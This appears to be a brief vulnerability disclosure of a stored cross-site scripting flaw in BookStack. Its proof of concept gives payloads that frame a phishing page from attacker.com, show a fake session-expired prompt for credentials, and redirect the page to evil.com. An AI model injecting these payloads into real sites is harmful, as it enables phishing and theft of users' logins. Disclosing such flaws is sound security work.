Cross-site Scripting (XSS) - Stored in bookstackapp/bookstack
Mar 5th 2022
Proof of Concept
Tested on Firefox.
<!-- phishing.html | change page content to <iframe src="http://attacker.com/phishing.html"> -->
<script>alert("Your session has expired, Please enter your credential again")</script>
<script>window.top.location.href = "http://evil.com";</script>
This vulnerability can be used for phishing and for stealing users' data: the injected frame or redirect shows a fake login page under the trusted application's origin.